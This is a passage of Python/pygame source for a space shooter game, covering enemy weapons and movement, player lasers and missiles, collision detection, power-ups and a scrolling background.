self.enemy_angle == 0 and\r\n self.enemy_rect.centery >= 150 and\r\n powerups.pcollected != 'freeze'):\r\n self.draw_plasma(dt)\r\n\r\n if powerups.pcollected != 'freeze':\r\n if self.enemy_rect.left < 5:\r\n self.enemy_xspeed = 0.5\r\n elif self.enemy_rect.right > window_width-5:\r\n self.enemy_xspeed = -0.5\r\n\r\n if self.enemy_health > 0:\r\n self.cur_enemy_x += self.enemy_xspeed*dt\r\n self.cur_enemy_y += self.enemy_yspeed*dt\r\n #print(self.enemy_xspeed, end=' ' )\r\n\r\n self.enemy_rect.x = self.cur_enemy_x\r\n self.enemy_rect.y = self.cur_enemy_y\r\n\r\n for event in event_list:\r\n if event.type == self.rotate_enemy_event and powerups.pcollected != 'freeze':\r\n self.enemy_angle += 4\r\n self.lasers.clear()\r\n self.set_plasma()\r\n if self.weapon == 'plasma':\r\n self.weapon = 'laser'\r\n else:\r\n self.weapon = 'plasma'\r\n\r\n\r\n if self.enemy_health > 0:\r\n if not self.enemy_angle:\r\n window.blit(self.enemy_img,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n else:\r\n self.enemy_angle += 4\r\n\r\n self.rot_enemy = pg.transform.rotate(self.enemy_img, self.enemy_angle)\r\n self.rot_enemy_rect = self.rot_enemy.get_rect(center=self.enemy_rect.center)\r\n\r\n self.flash_surface = self.rot_enemy\r\n\r\n window.blit(self.rot_enemy, self.rot_enemy_rect)\r\n \r\n if self.enemy_angle >= 180:\r\n self.enemy_angle = 0\r\n self.enemy_img = pg.transform.rotate(self.enemy_img, 180)\r\n if self.weapon == 'plasma':\r\n self.set_plasma()\r\n \r\n '''\r\n if self.weapon == 'plasma':\r\n self.set_plasma()\r\n self.weapon = 'laser'\r\n self.lasers.clear()\r\n else:\r\n self.lasers.clear()\r\n self.weapon = 'plasma'\r\n self.set_plasma()\r\n '''\r\n else:\r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.flash_surface = self.rot_enemy if 
self.flash_surface == self.empty_img else self.empty_img\r\n window.blit(self.flash_surface,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n '''\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'laser' and\r\n self.enemy_angle == 0):\r\n for event in event_list:\r\n if event.type == self.laser_event:\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'plasma' and\r\n self.enemy_angle == 0 and\r\n self.enemy_rect.centery >= 150):\r\n self.draw_plasma(dt)\r\n '''\r\n #for plasma in self.plasmas:\r\n # if self.plasmas[plasma]['rect'].bottom >= window_width+10:\r\n # self.set_plasma()\r\n # break\r\n\r\n self.check_health(event_list)\r\n\r\n def check_health(self, event_list):\r\n global score_value, spawn_large_enemy_trigger1, spawn_medium_enemy_trigger1\r\n global spawn_large_enemy_trigger2, isinit_enemy_small_last, spawn_medium_enemy_trigger2\r\n global enemy_small_killed\r\n \r\n if self.enemy_health <= 0:\r\n self.lasers.clear()\r\n \r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.num_flash += 1\r\n if self.num_flash >= 12:\r\n score_value += 20\r\n spawn_large_enemy_trigger1 = False\r\n spawn_large_enemy_trigger2 = False\r\n spawn_medium_enemy_trigger1 = False\r\n spawn_medium_enemy_trigger2 = False\r\n isinit_enemy_small_last = False\r\n self.__init__()\r\n init_enemy_small_pos()\r\n increase_lvl()\r\n pg.time.set_timer(self.enemy_flash, 0)\r\n pg.time.set_timer(self.laser_event, 0)\r\n enemy_small_killed = 0\r\n\r\nenemy_large = EnemyLarge()\r\n\r\nspawn_large_enemy_trigger1 = False\r\nspawn_large_enemy_trigger2 = False\r\n\r\n\r\n#Flashing effect near the player battleship cannons\r\nflash_img = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\laser32.png').convert_alpha()\r\nblank_img = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\blank32.png').convert_alpha()\r\nflash_img_size = flash_img_w, flash_img_h = flash_img.get_size()\r\nflash_rect = flash_img.get_rect()\r\nflash1X, flash1Y = player_rect.x-8, player_rect.y+2\r\nflash2X, flash2Y = player_rect.x+player_img_w-24, player_rect.y+2\r\nshow_flash = True\r\nnum = 9\r\n\r\ndef draw_flash(prect, num):\r\n #global show_flash\r\n\r\n b1x, b1y = prect.x-8, prect.y+2\r\n b2x, b2y = prect.x+player_img_w-24, prect.y+2\r\n\r\n if 5 <= num < 10:\r\n #print('hi')\r\n window.blit(flash_img, (b1x, b1y))\r\n window.blit(flash_img, (b2x, b2y))\r\n if num == 9:\r\n return 0\r\n num += 1\r\n else:\r\n num += 1\r\n\r\n return num\r\n\r\n\r\n#Player laser bullets properties and functions\r\nlaser_img = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\minus32.png').convert_alpha()\r\nlaser_img_size = laser_img_w, laser_img_h = laser_img.get_size()\r\nlaser_rect = laser_img.get_rect()\r\nlaser_xspeed = 0\r\nlaser_yspeed = 1.2\r\nlasers = {}\r\ni = 1 #Laser number\r\nexplosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion1.wav')\r\n\r\ndef draw_laser(dt):\r\n global lasers, enemy_small, score_value, laser_img, enemy_medium\r\n global explosion_sound, hit_value, enemy_small_killed, channels\r\n\r\n delete = []\r\n for laser in lasers:\r\n if (lasers[laser]['laser1rect'].bottom <= -10 and\r\n lasers[laser]['laser2rect'].bottom <= -10):\r\n delete.append(laser)\r\n continue\r\n\r\n lasers[laser]['laserY_change'] = laser_yspeed*dt\r\n \r\n #Checking collision of lasers with different type of enemies \r\n for enemy in enemy_small:\r\n if (is_collide(enemy_small[enemy]['rect'], lasers[laser]['laser1rect']) and\r\n enemy_small[enemy]['alive']):\r\n 
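\r\n                # Hit: park this beam far off-screen so it cannot collide\r\n                # again, mark the craft dead (the explosion frames in\r\n                # draw_enemy_small take over) and credit score, rocket\r\n                # charge and the small-enemy kill counter.\r\n                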
lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n hit_value += 1\r\n enemy_small_killed += 1\r\n if mute == False:\r\n #explosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion1.wav')\r\n channels[1].play(explosion_sound)\r\n if (is_collide(enemy_small[enemy]['rect'], lasers[laser]['laser2rect']) and\r\n enemy_small[enemy]['alive']):\r\n lasers[laser]['laser2rect'].x = lasers[laser]['laser2rect'].y = -50\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n hit_value += 1\r\n enemy_small_killed += 1\r\n if mute == False:\r\n #explosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion2.wav')\r\n channels[1].play(explosion_sound)\r\n\r\n if (is_collide_medium(enemy_medium.enemy_rect, lasers[laser]['laser1rect']) and\r\n enemy_medium.enemy_health > 0):\r\n lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_medium.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_medium.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n if (is_collide_medium(enemy_medium.enemy_rect, lasers[laser]['laser2rect']) and\r\n enemy_medium.enemy_health > 0):\r\n lasers[laser]['laser2rect'].x = lasers[laser]['laser2rect'].y = -50\r\n enemy_medium.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_medium.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n\r\n if (is_collide_medium(enemy_large.enemy_rect, lasers[laser]['laser1rect']) and\r\n enemy_large.enemy_health > 0):\r\n lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_large.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_large.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n if (is_collide_medium(enemy_large.enemy_rect, lasers[laser]['laser2rect']) and\r\n enemy_large.enemy_health > 0):\r\n lasers[laser]['laser2rect'].x = lasers[laser]['laser2rect'].y = -50\r\n enemy_large.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_large.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n \r\n lasers[laser]['cur_laser1_y'] -= lasers[laser]['laserY_change']\r\n lasers[laser]['cur_laser2_y'] -= lasers[laser]['laserY_change']\r\n lasers[laser]['laser1rect'].y = lasers[laser]['cur_laser1_y']\r\n lasers[laser]['laser2rect'].y = lasers[laser]['cur_laser2_y']\r\n L1x = lasers[laser]['laser1rect'].x\r\n L1y = lasers[laser]['cur_laser1_y']\r\n L2x = lasers[laser]['laser2rect'].x\r\n L2y = lasers[laser]['cur_laser2_y']\r\n\r\n window.blit(lasers[laser]['img'], (L1x, L1y))\r\n window.blit(lasers[laser]['img'], (L2x, L2y))\r\n\r\n for key in delete:\r\n del lasers[key]\r\n \r\n\r\ndef add_laser():\r\n global lasers, i, laser_img, player_rect, mute, channels\r\n\r\n if mute == False:\r\n laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser1.wav')\r\n channels[3].play(laser_sound)\r\n\r\n if i > 20:\r\n i = 0\r\n\r\n lasers['laser'+str(i)] = {}\r\n lasers['laser'+str(i)]['img'] = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\minus32.png')\r\n lasers['laser'+str(i)]['laserY_change'] = 0\r\n lasers['laser'+str(i)]['cur_laser1_y'] = player_rect.y-32\r\n lasers['laser'+str(i)]['cur_laser2_y'] = player_rect.y-32\r\n lasers['laser'+str(i)]['laser1rect'] = laser_img.get_rect()\r\n lasers['laser'+str(i)]['laser2rect'] = laser_img.get_rect()\r\n lasers['laser'+str(i)]['laser1rect'].x = player_rect.x-8\r\n lasers['laser'+str(i)]['laser1rect'].y = player_rect.y + 5\r\n lasers['laser'+str(i)]['laser2rect'].x 
= player_rect.x+player_img_w-24\r\n lasers['laser'+str(i)]['laser2rect'].y = player_rect.y + 5\r\n \r\n i += 1\r\n\r\n\r\ndef is_collide(enrect, lrect):\r\n if int(math.fabs(lrect.midtop[1] - enrect.center[1])) <= 55:\r\n if enrect.left <= lrect.midtop[0] <= enrect.right:\r\n return True\r\n\r\n return False\r\n\r\ndef is_collide_medium(enrect, lrect):\r\n if int(math.fabs(lrect.midtop[1] - enrect.center[1])) <= 80:\r\n if enrect.left <= lrect.midtop[0] <= enrect.right:\r\n return True\r\n\r\n return False\r\n\r\n#Charge value properties and functions(for rocket)\r\ncharge_value = 0\r\ncharge_img_list = []\r\nfor i in range(1,13):\r\n charge_img_list.append(pg.image.load(fr'.\\resources\\images\\power-up\\charging-up\\loader{i}(80).png').convert_alpha())\r\ncharge_rect = charge_img_list[0].get_rect(left=10, bottom=window_height-10)\r\nrocket_img1 = pg.image.load(r'.\\resources\\images\\power-up\\charging-up\\missile-fill56.png').convert_alpha()\r\nrocket_rect = rocket_img1.get_rect(center=charge_rect.center)\r\nhit_value = 0\r\ncharge_up_sound = mixer.Sound(r'.\\resources\\sounds\\charge-up.wav')\r\ncharge_rot_img = charge_img_list[11]\r\ncharge_rot_angle = 1\r\n\r\ndef draw_charge_quantity():\r\n global charge_value, charge_img_list, charge_rect, rocket_img1, rocket_rect\r\n global hit_value, mute, charge_up_sound, charge_rot_img, charge_rot_angle, channels\r\n\r\n if charge_value > 0:\r\n if charge_value == 12:\r\n charge_rot_img = pg.transform.rotate(charge_img_list[11], charge_rot_angle)\r\n charge_rot_rect = charge_rot_img.get_rect(center=charge_rect.center)\r\n window.blit(charge_rot_img, charge_rot_rect)\r\n charge_rot_angle += 1\r\n else: \r\n window.blit(charge_img_list[charge_value-1], charge_rect)\r\n\r\n window.blit(rocket_img1, rocket_rect)\r\n\r\n if hit_value >= 5:\r\n hit_value = 0\r\n if charge_value < 12:\r\n charge_value += 1\r\n if mute == False:\r\n channels[8].play(charge_up_sound)\r\n\r\n if charge_value == 0:\r\n charge_rot_angle = 1\r\n\r\n\r\n#Player missile properties and functions\r\nmissile_img = pg.image.load(r'.\\resources\\images\\bullet\\missile-fill-small.png').convert_alpha()\r\nmissile_rect = missile_img.get_rect(midbottom=player_rect.midtop)\r\nmissile_yspeed = 0.7\r\nmissile_cur_x = missile_rect.x\r\nmissile_cur_y = missile_rect.y\r\nmissile_draw = False\r\nmissile_launch = False\r\nmissile_explosion_dict = {}\r\nmissile_explosion_delay = 200\r\nmissile_explosion_time_elapse = 0\r\nexplosion_i = 0\r\nmissile_explosion = False\r\nexplosion_center = (0, 0)\r\nexplosion_effect = True\r\nmissile_launch_sound = mixer.Sound(r'.\\resources\\sounds\\rocket-deploy.wav')\r\nmissile_explosion_sound = mixer.Sound(r'.\\resources\\sounds\\large-explosion-short.wav')\r\nmissile_explosion_sound.set_volume(0.7)\r\n\r\nfor i in range(1, 18):\r\n explosion = 'explosion' + str(i)\r\n missile_explosion_dict[explosion] = [pg.image.load(fr'.\\resources\\images\\bullet\\missile-explosion\\{explosion}.png').convert_alpha()]\r\n\r\nfor explosion in missile_explosion_dict:\r\n missile_explosion_dict[explosion].append(missile_explosion_dict[explosion][0].get_rect())\r\n\r\nexplosion_list = list(missile_explosion_dict.keys())\r\nexplosion_cycle = explosion_list[explosion_i:explosion_i+3]\r\n\r\ndef draw_missile(dt):\r\n global missile_img, missile_rect, missile_yspeed, missile_cur_x\r\n global missile_cur_y, missile_draw, missile_explosion_time_elapse\r\n global explosion_i, explosion_cycle, player_rect, missile_explosion\r\n global explosion_center, enemy_small, score_value, 
enemy_medium\r\n global explosion_effect, enemy_large, window_rect, hit_value, channels\r\n global missile_explosion_sound, missile_launch_sound, enemy_small_killed\r\n\r\n if missile_draw:\r\n window.blit(missile_img, (missile_cur_x, missile_cur_y))\r\n\r\n missile_cur_y -= missile_yspeed * dt\r\n\r\n missile_rect.y = missile_cur_y\r\n\r\n if missile_rect.top <= 150:\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n\r\n #Checking collision of missile with different type of enemies\r\n for enemy in enemy_small:\r\n if (enemy_small[enemy]['rect'].colliderect(missile_rect) and\r\n enemy_small[enemy]['alive'] and\r\n missile_draw):\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n hit_value += 1\r\n enemy_small_killed += 1\r\n\r\n if (enemy_medium.enemy_rect.colliderect(window_rect) and\r\n enemy_medium.enemy_rect.colliderect(missile_rect) and\r\n enemy_medium.enemy_health > 0 and\r\n explosion_effect and\r\n missile_draw):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_medium.enemy_health = enemy_medium.enemy_health - 5 if enemy_medium.enemy_health > 5 else 0\r\n #print(enemy_medium.enemy_health)\r\n explosion_effect = False\r\n enemy_medium.lasers.clear()\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n hit_value += 2\r\n #if mute == False:\r\n # explosion_sound.play()\r\n\r\n if (enemy_large.enemy_rect.colliderect(window_rect) and\r\n enemy_large.enemy_rect.colliderect(missile_rect) and\r\n enemy_large.enemy_health > 0 and\r\n explosion_effect and\r\n missile_draw):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_large.enemy_health = enemy_large.enemy_health - 5 if enemy_large.enemy_health > 5 else 0\r\n #print(enemy_large.enemy_health)\r\n explosion_effect = False\r\n for plasma in enemy_large.plasmas:\r\n enemy_large.plasmas[plasma]['draw'] = False\r\n enemy_large.lasers.clear()\r\n explosion_center = missile_rect.midtop\r\n missile_draw = False\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_explosion = True\r\n hit_value += 2\r\n #if mute == False:\r\n # explosion_sound.play()\r\n \r\n\r\n \r\n if missile_explosion:\r\n if mute == False and missile_explosion_time_elapse == 0:\r\n channels[4].play(missile_explosion_sound)\r\n #print(explosion_cycle)\r\n for explosion in explosion_cycle:\r\n missile_explosion_dict[explosion][1].center = explosion_center\r\n window.blit(missile_explosion_dict[explosion][0],\r\n missile_explosion_dict[explosion][1])\r\n\r\n missile_explosion_time_elapse += dt\r\n if missile_explosion_time_elapse >= 80:\r\n explosion_i += 1\r\n explosion_cycle = explosion_list[explosion_i:explosion_i+3]\r\n missile_explosion_time_elapse = 1\r\n\r\n if explosion_i == len(missile_explosion_dict)-1:\r\n missile_explosion_time_elapse = 0\r\n explosion_i = 0\r\n missile_explosion = False\r\n explosion_cycle = explosion_list[explosion_i:explosion_i+3]\r\n explosion_effect = True\r\n for explosion in missile_explosion_dict:\r\n missile_explosion_dict[explosion][1].center = (-1000, -1000)\r\n\r\n #Checking collision of explosion with different type of enemies \r\n for enemy in enemy_small:\r\n if 
(enemy_small[enemy]['rect'].colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_small[enemy]['alive']):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n enemy_small_killed += 1\r\n\r\n if (enemy_small[enemy]['laser_rect'].colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_small[enemy]['laser_draw']):\r\n enemy_small[enemy]['laser_draw'] = False\r\n #if mute == False:\r\n #explosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion1.wav')\r\n #explosion_sound.play()\r\n\r\n if (enemy_medium.enemy_rect.colliderect(window_rect) and\r\n enemy_medium.enemy_rect.colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_medium.enemy_health > 0 and\r\n explosion_effect):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_medium.enemy_health = enemy_medium.enemy_health - 5 if enemy_medium.enemy_health > 5 else 0\r\n #print(enemy_medium.enemy_health)\r\n explosion_effect = False\r\n enemy_medium.lasers.clear()\r\n #if mute == False:\r\n # explosion_sound.play()\r\n\r\n if (enemy_large.enemy_rect.colliderect(window_rect) and\r\n enemy_large.enemy_rect.colliderect(missile_explosion_dict[explosion_cycle[-2]][1]) and\r\n enemy_large.enemy_health > 0 and\r\n explosion_effect):\r\n #lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_large.enemy_health = enemy_large.enemy_health - 5 if enemy_large.enemy_health > 5 else 0\r\n #print(enemy_large.enemy_health)\r\n explosion_effect = False\r\n for plasma in enemy_large.plasmas:\r\n enemy_large.plasmas[plasma]['draw'] = False\r\n enemy_large.lasers.clear()\r\n #if mute == False:\r\n # explosion_sound.play()\r\n \r\n\r\n#Player power-ups properties and functions\r\nclass PowerUps():\r\n\r\n def __init__(self):\r\n self.powerups = {\r\n 'life' : {'img' : pg.image.load(r'.\\resources\\images\\power-up\\life-fill48.png').convert_alpha(),\r\n 'img_invert' : pg.image.load(r'.\\resources\\images\\power-up\\life-fill-invert48.png').convert_alpha(),\r\n 'rect' : pg.Rect(0, 0, 48, 48),\r\n 'sound' : mixer.Sound(r'.\\resources\\sounds\\pickup-01.wav'),\r\n 'draw' : False,\r\n 'func' : self.life_powerup},\r\n 'freeze' : {'img' : pg.image.load(r'.\\resources\\images\\power-up\\freeze-fill48.png').convert_alpha(),\r\n 'img_invert' : pg.image.load(r'.\\resources\\images\\power-up\\freeze-fill-invert48.png').convert_alpha(),\r\n 'rect' : pg.Rect(0, 0, 48, 48),\r\n 'sound' : mixer.Sound(r'.\\resources\\sounds\\freeze-loud.wav'),\r\n 'sound2' : mixer.Sound(r'.\\resources\\sounds\\depressurized.wav'),\r\n 'draw' : False,\r\n 'func' : self.freeze_powerup},\r\n 'charge' : {'img' : pg.image.load(r'.\\resources\\images\\power-up\\charge-fill48.png').convert_alpha(),\r\n 'img_invert' : pg.image.load(r'.\\resources\\images\\power-up\\charge-fill-invert48.png').convert_alpha(),\r\n 'rect' : pg.Rect(0, 0, 48, 48),\r\n 'sound' : mixer.Sound(r'.\\resources\\sounds\\charge-up.wav'),\r\n 'draw' : False,\r\n 'func' : self.charge_powerup},\r\n }\r\n\r\n self.yspeed = 0.2\r\n self.pchoice = None\r\n self.time_elapse = 0\r\n self.pcollected = None\r\n \r\n self.original_speed = {\r\n 'enemy_small' : [],\r\n 'enemy_medium' : [],\r\n 'enemy_large' : []\r\n }\r\n self.freeze_time = 0\r\n \r\n\r\n def draw(self, dt):\r\n\r\n if self.pchoice is None:\r\n option_list = list(self.powerups.keys()) + [None] \r\n self.pchoice = random.choices(option_list, [1, 1, 2, 2996])[0]\r\n if self.pchoice 
is not None:\r\n self.powerups[self.pchoice]['rect'].center = (random.randint(50, window_width-50), -100)\r\n self.powerups[self.pchoice]['draw'] = True\r\n self.time_elapse = 0\r\n\r\n if self.pchoice is not None:\r\n \r\n if self.powerups[self.pchoice]['draw']:\r\n if self.time_elapse <= 700:\r\n window.blit(self.powerups[self.pchoice]['img'], self.powerups[self.pchoice]['rect'])\r\n elif self.time_elapse <= 1400:\r\n window.blit(self.powerups[self.pchoice]['img_invert'], self.powerups[self.pchoice]['rect'])\r\n\r\n if self.time_elapse > 1400:\r\n self.time_elapse = 0\r\n\r\n self.time_elapse += dt\r\n \r\n self.powerups[self.pchoice]['rect'].y += self.yspeed * dt\r\n\r\n if self.powerups[self.pchoice]['rect'].y > window_height+5:\r\n self.powerups[self.pchoice]['rect'].center = (0,0)\r\n self.powerups[self.pchoice]['draw'] = False\r\n self.pchoice = None\r\n self.pcollected = None\r\n\r\n def life_powerup(self, dt):\r\n global player_health, mute, player_max_health, channels\r\n\r\n self.pcollected = 'life'\r\n\r\n if player_health < player_max_health and self.powerups['life']['draw']:\r\n player_health += 1\r\n if mute == False:\r\n channels[5].play(self.powerups['life']['sound'])\r\n\r\n self.powerups['life']['draw'] = False\r\n self.pchoice = None\r\n self.pcollected = None\r\n\r\n def charge_powerup(self, dt):\r\n global charge_value, mute, channels\r\n\r\n self.pcollected = 'charge'\r\n\r\n if charge_value < 12 and self.powerups['charge']['draw']:\r\n charge_value += 1\r\n if mute == False:\r\n channels[8].play(self.powerups['charge']['sound'])\r\n\r\n self.powerups['charge']['draw'] = False\r\n self.pchoice = None\r\n self.pcollected = None\r\n\r\n def freeze_powerup(self, dt):\r\n global enemy_small, mute, player_rect, enemy_medium, enemy_large, channels\r\n\r\n self.pcollected = 'freeze'\r\n\r\n if self.powerups['freeze']['draw']: \r\n #if mute == False:\r\n # self.powerups['charge']['sound'].play()\r\n self.powerups['freeze']['draw'] = False\r\n #self.pchoice = None\r\n\r\n self.powerups['freeze']['rect'].center = player_rect.center \r\n\r\n if self.freeze_time == 0:\r\n if mute == False:\r\n channels[6].play(self.powerups['freeze']['sound'])\r\n for enemy in enemy_small:\r\n self.original_speed['enemy_small'].append([enemy_small[enemy]['enemy_smallX_change'],\r\n enemy_small[enemy]['enemy_smallY_change']])\r\n enemy_small[enemy]['enemy_smallX_change'] = 0\r\n enemy_small[enemy]['enemy_smallY_change'] = 0\r\n\r\n self.original_speed['enemy_medium'].append([enemy_medium.enemy_xspeed,\r\n enemy_medium.enemy_yspeed])\r\n enemy_medium.enemy_xspeed = 0\r\n enemy_medium.enemy_yspeed = 0\r\n enemy_medium.lasers.clear()\r\n\r\n self.original_speed['enemy_large'].append([enemy_large.enemy_xspeed,\r\n enemy_large.enemy_yspeed])\r\n enemy_large.plasma_sound.fadeout(20)\r\n enemy_large.enemy_xspeed = 0\r\n enemy_large.enemy_yspeed = 0\r\n enemy_large.lasers.clear()\r\n enemy_large.set_plasma()\r\n \r\n\r\n self.freeze_time += dt\r\n if 2700 >= self.freeze_time >= 2650:\r\n if mute == False:\r\n channels[7].play(self.powerups['freeze']['sound2'])\r\n if self.freeze_time >= 3000:\r\n for enemy, orig_speed in zip(enemy_small, self.original_speed['enemy_small']):\r\n enemy_small[enemy]['enemy_smallX_change'] = orig_speed[0]\r\n enemy_small[enemy]['enemy_smallY_change'] = orig_speed[1]\r\n\r\n enemy_medium.enemy_xspeed = self.original_speed['enemy_medium'][0][0]\r\n enemy_medium.enemy_yspeed = self.original_speed['enemy_medium'][0][1]\r\n \r\n enemy_large.enemy_xspeed = 
self.original_speed['enemy_large'][0][0]\r\n enemy_large.enemy_yspeed = self.original_speed['enemy_large'][0][1]\r\n \r\n self.original_speed['enemy_small'].clear()\r\n self.original_speed['enemy_medium'].clear()\r\n self.original_speed['enemy_large'].clear()\r\n\r\n self.powerups['freeze']['rect'].center = (0,0)\r\n self.freeze_time = 0\r\n self.pchoice = None\r\n self.pcollected = None\r\n \r\n\r\npowerups = PowerUps()\r\n\r\n#Moving background properties and functions\r\nclass Background():\r\n def __init__(self):\r\n self.b_r1c1 = pg.image.load(r'.\\resources\\images\\background\\background_horizontal1.png').convert_alpha()\r\n self.b_r1c2 = pg.image.load(r'.\\resources\\images\\background\\background_horizontal2.png').convert_alpha()\r\n self.b_r2c1 = pg.image.load(r'.\\resources\\images\\background\\background_vertical1.png').convert_alpha()\r\n self.b_r2c2 = pg.image.load(r'.\\resources\\images\\background\\background_vertical2.png').convert_alpha()\r\n self.translucent = pg.image.load(r'.\\resources\\images\\background\\background(40%alpha).png').convert_alpha()\r\n\r\n self.xspeed = 0\r\n self.yspeed = 0.15\r\n\r\n self.b_r1c1_rect = self.b_r1c1.get_rect(center=(window_width/2, window_height/2))\r\n self.b_r1c2_rect = self.b_r1c2.get_rect(midleft=self.b_r1c1_rect.midright)\r\n self.b_r2c1_rect = self.b_r2c1.get_rect(midtop=self.b_r1c1_rect.midbottom)\r\n self.b_r2c2_rect = self.b_r2c2.get_rect(midleft=self.b_r2c1_rect.midright)\r\n\r\n self.row_rects = [[self.b_r1c1_rect, self.b_r1c2_rect],\r\n [self.b_r2c1_rect, self.b_r2c2_rect]]\r\n self.col_rects = [list(col) for col in zip(*self.row_rects)]\r\n \r\n def draw_background(self, dt):\r\n global playerX_change, playerY_change, window_rect\r\n \r\n if playerX_change == 0:\r\n self.xspeed = 0\r\n elif playerX_change > 0:\r\n self.xspeed = -0.2\r\n elif playerX_change < 0:\r\n self.xspeed = 0.2\r\n if playerY_change == 0:\r\n self.yspeed = 0.15\r\n elif playerY_change > 0:\r\n self.yspeed = 0.1\r\n elif playerY_change < 0:\r\n self.yspeed = 0.25\r\n\r\n \r\n self.b_r1c1_rect.centerx += self.xspeed*dt\r\n self.b_r1c1_rect.centery += self.yspeed*dt\r\n self.b_r1c2_rect.centerx += self.xspeed*dt\r\n self.b_r1c2_rect.centery += self.yspeed*dt\r\n self.b_r2c1_rect.centerx += self.xspeed*dt\r\n self.b_r2c1_rect.centery += self.yspeed*dt\r\n self.b_r2c2_rect.centerx += self.xspeed*dt\r\n self.b_r2c2_rect.centery += self.yspeed*dt\r\n\r\n #win_rect = window.get_rect(topleft=(0,0))\r\n\r\n if self.b_r1c1_rect.colliderect(window_rect):\r\n window.blit(self.b_r1c1, self.b_r1c1_rect)\r\n #print('1', end='')\r\n if self.b_r1c2_rect.colliderect(window_rect):\r\n window.blit(self.b_r1c2, self.b_r1c2_rect)\r\n #print('2', end='')\r\n if self.b_r2c1_rect.colliderect(window_rect):\r\n window.blit(self.b_r2c1, self.b_r2c1_rect)\r\n #print('3', end='')\r\n if self.b_r2c2_rect.colliderect(window_rect):\r\n window.blit(self.b_r2c2, self.b_r2c2_rect)\r\n #print('4', end='')\r\n \r\n '''\r\n window.blit(self.b_r1c1, self.b_r1c1_rect)\r\n window.blit(self.b_r1c2, self.b_r1c2_rect)\r\n window.blit(self.b_r2c1, self.b_r2c1_rect)\r\n window.blit(self.b_r2c2, self.b_r2c2_rect)\r\n '''\r\n window.blit(self.translucent, (0,0))\r\n\r\n \r\n for row in self.row_rects:\r\n for i, rect in enumerate(row):\r\n if rect.left >= -20:\r\n if i == 0:\r\n row[1].midright = rect.midleft\r\n elif i == 1:\r\n row[0].midright = rect.midleft\r\n\r\n if rect.right <= window_width+20:\r\n if i == 0:\r\n row[1].midleft = rect.midright\r\n elif i == 1:\r\n row[0].midleft = 
rect.midright\r\n\r\n for col in self.col_rects:\r\n for i, rect in enumerate(col):\r\n if rect.top >= -20:\r\n if i == 0:\r\n col[1].midbottom = rect.midtop\r\n elif i == 1:\r\n col[0].midbottom = rect.midtop\r\n \r\nbackground = Background() \r\n\r\n\r\n#Backgound Objects properties and functions \r\nclass BackgroundObjects():\r\n \r\n def __init__(self):\r\n \r\n self.objects = {}\r\n\r\n i = 1 \r\n for obj in os.listdir(r'.\\resources\\images\\background-objects'):\r\n if obj.endswith(r'.png'):\r\n path = '.\\\\resources\\\\images\\\\background-objects\\\\' + obj \r\n self.objects['object'+str(i)] = {}\r\n self.objects['object'+str(i)]['img'] = pg.image.load(path).convert_alpha()\r\n i += 1\r\n\r\n self.xspeed = 0\r\n self.yspeed = [0.1, 0.2, 0.3] #[0.06, 0.12, 0.18]\r\n\r\n self.obj_draw = []\r\n \r\n self.set_param()\r\n \r\n def set_param(self):\r\n\r\n for obj in self.objects:\r\n self.objects[obj]['rect'] = self.objects[obj]['img'].get_rect()\r\n self.objects[obj]['xchange'] = self.xspeed\r\n \r\n if self.objects[obj]['img'].get_width() == 32:\r\n self.objects[obj]['ychange'] = self.yspeed[0]\r\n elif self.objects[obj]['img'].get_width() == 40:\r\n self.objects[obj]['ychange'] = self.yspeed[1]\r\n elif self.objects[obj]['img'].get_width() == 48:\r\n self.objects[obj]['ychange'] = self.yspeed[2]\r\n \r\n self.objects[obj]['cur_x'] = random.randint(20, window_width-self.objects[obj]['img'].get_width()-20)\r\n self.objects[obj]['cur_y'] = random.randint(-1000, -50)\r\n\r\n def _reset(self, 